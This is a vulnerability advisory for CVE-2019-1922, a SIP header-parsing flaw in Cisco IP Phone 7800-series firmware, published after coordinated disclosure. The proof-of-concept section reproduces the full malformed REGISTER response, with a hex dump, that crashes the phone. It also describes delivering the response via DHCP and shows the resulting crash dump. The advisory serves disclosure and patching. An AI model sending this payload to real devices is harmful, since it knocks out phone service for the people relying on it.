Cisco IP Phone SIP Denial of Service Vulnerability

09 July 2019

 

CVE   

 

CVE-2019-1922

 

CVSS SCORE

 

5.3 (AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H)

 

XID

 

XL-19-015

 

AFFECTED VENDORS

 

Cisco Systems

 

CREDIT

 

Thomas Sabono - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

 

The CISCO IP Phone product is vulnerable to memory corruption related to a NULL pointer dereference through a malicious SIP (Session Initiation Protocol) request. An attacker can abuse this vulnerability to trigger a Denial of Service (DoS) or execute remote code on the CISCO IP Phone.

 

TECHNICAL DETAILS

     

 

The CISCO IP Phone does not safely parse headers from SIP request. While parsing headers, terminators are not properly checked. This leads to improper settings of sipMessage_t structure from libsip.so library.

 

PROOF OF CONCEPT 

 

 

 

 

This vulnerability can be triggered by setting the router of the CISCO IP Phone to the target “malicious” computer via DHCP. When CISCO IP Phone boots up, SIP requests are sent to initialize the phone. Two types of request are sent: REGISTER and REFER. Replying to REGISTER request with malformed CSeq header triggers a denial of service.2 

The REGISTER response request below triggers the vulnerability:

 

 

SIP/2.0 200 OK

Content-Length: 0

Via: SIP/2.0/UDP 10.0.42.9:5060;branch=z9hG4bK7e2c1bae

From: <sip:208@10.0.42.1>;tag=b07d47d0ca8300056b867fe2-71d5dce9

Expires: 3600

To: <sip:208@10.0.42.1>

Contact: <sip:208@10.0.42.9:5060;transport=udp>;+sip.instance="<urn:uuid:00000000-0000-0000-0000-b07d47d0ca83>"; +u.sip!devicename.ccm.cisco.com="SEPB07D47D0CA83"; +u.sip!model.ccm.cisco.com="621"

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW  WWWWW

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

WWWWWWWWW     WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Max-Forwards: 69

Call-ID: b07d47d0-ca830002-60214816-504b36b9@10.0.42.9

 

 

0x0000: 53 49 50 2F 32 2E 30 20 32 30 30 20 4F 4B 0D 0A     S I P / 2 . 0   2 0 0   O K . .

0x0010: 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20     C o n t e n t - L e n g t h : 

0x0020: 30 0D 0A 56 69 61 3A 20 53 49 50 2F 32 2E 30 2F     0 . . V i a :   S I P / 2 . 0 /

0x0030: 55 44 50 20 31 30 2E 30 2E 34 32 2E 39 3A 35 30     U D P   1 0 . 0 . 4 2 . 9 : 5 0

0x0040: 36 30 3B 62 72 61 6E 63 68 3D 7A 39 68 47 34 62     6 0 ; b r a n c h = z 9 h G 4 b

0x0050: 4B 37 65 32 63 31 62 61 65 0D 0A 46 72 6F 6D 3A     K 7 e 2 c 1 b a e . . F r o m :

0x0060: 20 3C 73 69 70 3A 32 30 38 40 31 30 2E 30 2E 34       < s i p : 2 0 8 @ 1 0 . 0 . 4

0x0070: 32 2E 31 3E 3B 74 61 67 3D 62 30 37 64 34 37 64     2 . 1 > ; t a g = b 0 7 d 4 7 d

0x0080: 30 63 61 38 33 30 30 30 35 36 62 38 36 37 66 65     0 c a 8 3 0 0 0 5 6 b 8 6 7 f e

0x0090: 32 2D 37 31 64 35 64 63 65 39 0D 0A 45 78 70 69     2 - 7 1 d 5 d c e 9 . . E x p i

0x00A0: 72 65 73 3A 20 33 36 30 30 0D 0A 54 6F 3A 20 3C     r e s :   3 6 0 0 . . T o :   <

0x00B0: 73 69 70 3A 32 30 38 40 31 30 2E 30 2E 34 32 2E     s i p : 2 0 8 @ 1 0 . 0 . 4 2 .

0x00C0: 31 3E 0D 0A 43 6F 6E 74 61 63 74 3A 20 3C 73 69     1 > . . C o n t a c t :   < s i

0x00D0: 70 3A 32 30 38 40 31 30 2E 30 2E 34 32 2E 39 3A     p : 2 0 8 @ 1 0 . 0 . 4 2 . 9 :

0x00E0: 35 30 36 30 3B 74 72 61 6E 73 70 6F 72 74 3D 75     5 0 6 0 ; t r a n s p o r t = u

0x00F0: 64 70 3E 3B 2B 73 69 70 2E 69 6E 73 74 61 6E 63     d p > ; + s i p . i n s t a n c

0x0100: 65 3D 22 3C 75 72 6E 3A 75 75 69 64 3A 30 30 30     e = " < u r n : u u i d : 0 0 0

0x0110: 30 30 30 30 30 2D 30 30 30 30 2D 30 30 30 30 2D     0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 -

0x0120: 30 30 30 30 2D 62 30 37 64 34 37 64 30 63 61 38     0 0 0 0 - b 0 7 d 4 7 d 0 c a 8

0x0130: 33 3E 22 3B 2B 75 2E 73 69 70 21 64 65 76 69 63     3 > " ; + u . s i p ! d e v i c

0x0140: 65 6E 61 6D 65 2E 63 63 6D 2E 63 69 73 63 6F 2E     e n a m e . c c m . c i s c o .

0x0150: 63 6F 6D 3D 22 53 45 50 42 30 37 44 34 37 44 30     c o m = " S E P B 0 7 D 4 7 D 0

0x0160: 43 41 38 33 22 3B 2B 75 2E 73 69 70 21 6D 6F 64     C A 8 3 " ; + u . s i p ! m o d

0x0170: 65 6C 2E 63 63 6D 2E 63 69 73 63 6F 2E 63 6F 6D     e l . c c m . c i s c o . c o m

0x0180: 3D 22 36 32 31 22 0D 0A 43 53 65 71 3A 20 31 30     = " 6 2 1 " . . C S e q :   1 0

0x0190: 32 20 57 57 57 57 57 57 57 57 57 57 57 57 57 57     2   W W W W W W W W W W W W W W

0x01A0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01B0: 57 57 57 57 57 0D 57 57 57 57 57 57 57 57 57 57     W W W W W . W W W W W W W W W W

0x01C0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01D0: 57 57 57 0D 57 57 57 57 57 57 57 57 20 57 57 57     W W W . W W W W W W W W   W W W

0x01E0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x01F0: 57 57 57 57 57 0D 57 57 57 57 57 57 57 57 57 57     W W W W W . W W W W W W W W W W

0x0200: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 00     W W W W W W W W W W W W W W W .

0x0210: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0220: 57 57 57 57 57 57 57 57 57 09 57 57 57 57 57 0A     W W W W W W W W W . W W W W W .

0x0230: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0240: 57 57 57 57 57 57 00 57 57 57 57 57 57 57 57 57     W W W W W W . W W W W W W W W W

0x0250: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0260: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0270: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0280: 57 57 57 57 57 57 57 57 57 57 0A 57 57 57 57 57     W W W W W W W W W W . W W W W W

0x0290: 57 57 57 57 09 57 57 57 57 57 57 57 57 57 57 57     W W W W . W W W W W W W W W W W

0x02A0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02B0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02C0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02D0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02E0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x02F0: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57     W W W W W W W W W W W W W W W W

0x0300: 57 57 57 57 57 57 57 57 57 57 57 57 57 57 57 0D     W W W W W W W W W W W W W W W .

0x0310: 0A 4D 61 78 2D 46 6F 72 77 61 72 64 73 3A 20 36     . M a x - F o r w a r d s :   6

0x0320: 39 0D 0A 43 61 6C 6C 2D 49 44 3A 20 62 30 37 64     9 . . C a l l - I D :   b 0 7 d

0x0330: 34 37 64 30 2D 63 61 38 33 30 30 30 32 2D 36 30     4 7 d 0 - c a 8 3 0 0 0 2 - 6 0

0x0340: 32 31 34 38 31 36 2D 35 30 34 62 33 36 62 39 40     2 1 4 8 1 6 - 5 0 4 b 3 6 b 9 @

0x0350: 31 30 2E 30 2E 34 32 2E 39 0D 0A 0D 0A              1 0 . 0 . 4 2 . 9 . . . .

 

Figure 1 – Malicious REGISTER response with hexadecimal representation

 

 

The carriage return characters are highlighted in the hexadecimal representation in the request above. This is the origin of the vulnerability. Sending that response as a reply to the REGISTER request coming from the CISCO IP Phone, produces the following crash dump:

 

************************************************************

*             Dumping Registers                            *

************************************************************

R0 =   00000000

R1 =   B3FF68F0

R2 =   B3FF68F0

R3 =   B3FF68F0

R4 =   B3FA9850

R5 =   FFFFFFFF

R6 =   00000000

R7 =   00000152

R8 =   00000000

R9 =   B634B704

R10 = B634B704

FP =   B303A274

IP =   B3FDF440

LR =   B3E4EA78

PC =   470E43E0

CPSR = 80000010

FAULT = 00000000

STACK = B303A000

dump stack AAPCS enter

-----------failing frame --------------

/lib/libc.so.6(strcmp+0) [0x470e43e0]

---------------------------------------

#0  fp=0xb3e4e0e0 base=0xb3c85000, in sip_sm_determine_ccb at /usr/lib/libsip.so:0xb3e4e0d0  offset=0x001c90e0

#1  fp=0xb3e61ccc base=0xb3c85000, in sipSPISendErrorResponse at /usr/lib/libsip.so:0xb3e61cbc  offset=0x001dcccc

#2  fp=0xb3eab714 base=0xb3c85000, in (null) at /usr/lib/libsip.so:0x00000000  offset=0x00226714

#3  fp=0xb3eaab30 base=0xb3c85000, in SIPTaskProcessUDPMessage at /usr/lib/libsip.so:0xb3eaab20  offset=0x00225b30

#4  fp=0xb3e76be8 base=0xb3c85000, in sip_platform_udp_read_socket at /usr/lib/libsip.so:0xb3e76bd8  offset=0x001f1be8

#5  fp=0xb3ec4f48 base=0xb3c85000, in SIPTask at /usr/lib/libsip.so:0xb3ec4f38  offset=0x0023ff48

#6  fp=0x47138538 base=0x47070000, in clone at /lib/libc.so.6:0x471384b0  offset=0x000c8538

#7  fp=0xb6c0b218 base=0xb6bfc000, in (null) at /bin/libj9jit24.so:0x00000000  offset=0x0000f218

******unknown addr *** offset=0x2ae12000

****unable to access memory***

 

Figure 2: Crash dump triggered by a malicious REGISTER SIP reply

 

 

Due to the nature of this vulnerability, it may be possible to trigger the crash using all headers with any SIP requests.

 

AFFECTED SYSTEMS 

 

 

 

  

CISCO IP Phone CP-7811 / CP-7821 / CP-7841 / CP-7861

Version: sip78xx.11-5-1-1-18

Firmware Revision: sboot2.78xx.11-5-1-18.sbn

Software Revision: sip78xx.11-5-1-18.loads

 

SOLUTION  

 

 

Contact the vendor for a patch

(https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190703-ip-phone-sip-dos)

 

DISCLOSURE TIMELINE 

 

 

 

05/24/2019: Contacted Cisco Systems requesting disclosure coordination

05/24/2019: Provided vulnerability details

07/03/2019: Cisco Systems published advisory

07/09/2019: xen1thLabs public disclosure